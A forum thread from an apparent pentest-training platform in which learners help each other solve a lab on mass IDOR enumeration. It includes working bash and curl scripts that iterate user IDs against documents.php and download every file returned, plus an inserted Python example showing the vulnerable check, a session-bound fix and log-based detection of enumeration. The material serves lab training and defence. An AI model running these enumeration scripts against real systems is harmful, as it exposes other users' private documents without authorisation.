Web Attacks

Hello, I am going through the Web Attacks module. In the Mass IDOR Enumeration section I have a question. The entire section is talking about UIDs and enumerating them.

However when I spawn my target nothing on the target at all has any uid anywhere that I can see…

So my question is am I just missing something here? Or is there something wrong with the target being spawned? I did find an API I can enumerate but I don’t see any flag file anywhere and again there are 0 uids anywhere in the web app.

NVM… I found the UID; it just wasn’t in the URL like the examples showed. Looking more carefully through Burp, the UID is much more obvious.

Would you care to elaborate? I’m having the same problem and get nothing when I run the shell script with pdf or txt.

Did you look at the requests in BURP?

Ahh I see. I mean, obviously I did not do it right, but I used the bash script, the Intruder, etc., and everything else they talked about, but nothing. It’s just weird how they do that so much: talk about one thing and then do something COMPLETELY different. Don’t get me wrong, I love it, it’s just weird.

2 Likes

Got it, thank you sir. Somehow, staring at that exact same screen for hours, I still missed it until you said that.

I believe the idea is to make us think outside the box. In real-life pentests you have to do a lot of independent research and outside thinking. I have noticed the pattern in the Academy: they intentionally leave things out to make you look at it from a different angle. I know how that goes, I have spent days on some of these modules. Glad you got it!

3 Likes

Yeah you are right. I completely agree. Well they sure do a good job then! Thanks for your help 🙂

Anytime. I sure need the help often enough in here!

1 Like

You can try at random:
for i in {1..20}; do curl -s -X POST http://ip:port/documents.php -d "uid=$i"; done
You will find flag???.txt.
After that, try wget on the file and cat the file.
You will find the flag.

2 Likes

Use burp suite it will give all the info

So clicking the Documents link would not work for me if I used Firefox instead of Burp’s internal browser.

Once I used the internal browser, clicking http://SERVER:PORT/Documents worked, and I could see the POST request in Burp.

When I modified the script from the module to find extensions other than just .pdf and to curl POST requests (instead of the GET request in the example), I struggled to get the wget to download non-pdf files.

So I replaced the wget -q $url/$link with curl -O $url/$link, which seemed to work.

Was far more difficult than I anticipated. Is there an easier way that I’m missing?

Here is my final script, but give it a go yourself before revealing it!!

#!/bin/bash

# Base URL without a trailing slash: the links returned by documents.php
# already start with /documents/, so the two parts join without extra slashes.
url="http://SERVER:PORT"

for i in {1..20}; do
    # POST each uid and pull every /documents/... link (any extension) out of the response
    for link in $(curl -s -X POST -d "uid=$i" "$url/documents.php" | grep -oP "\/documents.*?\\.\\w+"); do
        # Quote the expansion so unusual characters in a link are not word-split or globbed
        curl -O "$url$link"
    done
done

5 Likes

Although I support your claim, riddling and re-instructing are not the same. Thus, the frustration everyone feels is extremely justifiable for a subscription-based learning platform that promotes the former. It does not benefit students to force them to rethink and develop poor study habits.

1 Like

Or, the creators simply cannot properly instruct nor re-instruct payees without riddling in a childlike manner. Directly asking tough questions, with the intent being to research specific topics prior to responding, would be more conducive if it actually counted towards the cube-collecting interactive modular work and could have beneficial results for those who are skills-building for a career in Information Technology, Cybersecurity, Pentesting etc.

1 Like

I believe that you are spot on about the Regular Expression Language (Regex) character in the for link loop of the bash script.

Might I suggest using the wget -v Command Line Tool (clt).

The verbose flag of wget is more descriptive whilst your method can be seen as intentionally vague for some ■■■■■ reason.

The encoded flag text can be recognized by a specific Uniform Resource Locator (url) query string.

1 Like

I had a hard time finding the flag from the examples on this forum. I did notice the downloaded PDF file was an MD5 hash of 1 and the get-document script referenced 1, so I took the long way and incremented 1 to 20 until I found the flag.

To all those who feel stuck in this and other ctfs, my piece of advice is not to make my mistake of wanting to finish the ctf quickly or when very tired. I approached this very ctf after a long day of work (I am a QA engineer), I was very tired and though I read both the text of the module and this thread many, many times, I was not able to understand anything about how to complete this ctf, even if the advice given in this thread is self-explanatory. Then I decided to stop and clear my mind during the morning and early evening of the following day, by forcing myself not to think of this ctf at all. When I went back to the ctf half an hour ago, I immediately understood the mistakes I was making the day before and how to solve it.

1 Like
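Two posts above describe the same weakness from two sides: the script that POSTs uid=1..20 to documents.php shows that the server honours whatever uid the client sends, and the observation that the downloaded file was named with the MD5 hash of the uid shows why hashing a small, sequential identifier does not hide it. The following is an added example, not code from the module or from any poster in this thread. It models that handler in Python as a stand-in for the PHP target: the vulnerable authorisation check beside a hardened one that binds uid to the session, the mapping from md5(uid) filenames back to uids, and a detection pass over constructed access-log lines that flags a session walking many uids. The document store, session tokens, and log format are all constructed assumptions for illustration.

```python
"""Added example, not the module's or any poster's code.

Models the documents.php behaviour described in this thread: a POST with a uid
returns that user's document links, and filenames are md5(uid).<ext>.
All data below is constructed; handler names, sessions and log format are assumed.
"""
import hashlib
import re
from collections import defaultdict


def doc_name(uid, ext):
    """Filename scheme observed in the thread: MD5 digest of the numeric uid."""
    return hashlib.md5(str(uid).encode()).hexdigest() + "." + ext


# Constructed document store: uid -> list of filenames.
DOCUMENTS = {
    1: [doc_name(1, "pdf"), doc_name(1, "txt")],
    2: [doc_name(2, "pdf")],
    7: [doc_name(7, "txt")],
}

# Constructed session table: session cookie -> authenticated uid.
SESSIONS = {"sess-alice": 1, "sess-bob": 2}


def list_documents_vulnerable(session, requested_uid):
    """IDOR pattern: any logged-in session may read any uid's documents,
    because the only check is that *a* valid session exists."""
    if session not in SESSIONS:
        raise PermissionError("not logged in")
    return DOCUMENTS.get(requested_uid, [])


def list_documents_hardened(session, requested_uid):
    """Fix: the authorisation decision uses the uid bound to the session.
    A request for another uid is refused instead of silently served."""
    owner = SESSIONS.get(session)
    if owner is None:
        raise PermissionError("not logged in")
    if requested_uid != owner:
        raise PermissionError(f"uid {requested_uid} is not owned by this session")
    return DOCUMENTS.get(owner, [])


def recover_uids_from_names(names, uid_range=range(1, 21)):
    """Why hashing the identifier is not access control: hashing the small
    candidate uid space once maps every md5(uid) filename back to its uid."""
    digest_to_uid = {hashlib.md5(str(u).encode()).hexdigest(): u for u in uid_range}
    recovered = {}
    for name in names:
        stem = name.rsplit(".", 1)[0]
        if stem in digest_to_uid:
            recovered[name] = digest_to_uid[stem]
    return recovered


# Constructed access-log lines (assumed format): session, method, path, body.
SAMPLE_LOG = """\
sess-alice POST /documents.php uid=1
sess-alice POST /documents.php uid=2
sess-alice POST /documents.php uid=3
sess-alice POST /documents.php uid=4
sess-alice POST /documents.php uid=5
sess-bob POST /documents.php uid=2
sess-bob POST /documents.php uid=2
"""

LOG_RE = re.compile(r"^(\S+) POST /documents\.php uid=(\d+)$")


def flag_uid_enumeration(log_text, threshold=3):
    """Detection: a legitimate user requests their own uid, so a session that
    touches many distinct uids is enumerating. Returns {session: sorted uids}."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)].add(int(m.group(2)))
    return {s: sorted(u) for s, u in seen.items() if len(u) >= threshold}


if __name__ == "__main__":
    leaked = list_documents_vulnerable("sess-alice", 7)
    print("vulnerable handler served uid 7's documents to alice:", leaked)
    print("filenames map back to uids:", recover_uids_from_names(leaked))
    try:
        list_documents_hardened("sess-alice", 7)
    except PermissionError as err:
        print("hardened handler refused:", err)
    print("sessions flagged for enumeration:", flag_uid_enumeration(SAMPLE_LOG))
```

The hardened handler is the actual fix for the module's finding: the uid is not an input at all, it is derived from the authenticated session, so the POST body cannot select another user's documents. Renaming files to md5(uid) changes nothing about that, as recover_uids_from_names shows. On the monitoring side, a single session issuing POSTs to documents.php with a run of different uids is the signature the detection function keys on.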

The scripts did not work for me. I managed to complete Mass IDOR Enumeration and Bypassing Encoded Characters without scripts, using only Burp Intruder.

Thanks Buddy 😉

IF like me YOU GET HERE after you have been looking around the internet for an answer, you have found some script and it still doesn’t work: swap your wget command for curl -O $url/$link. No need for Burp or ZAP etc., just bash and curl. DM me if you get stuck 😸

1 Like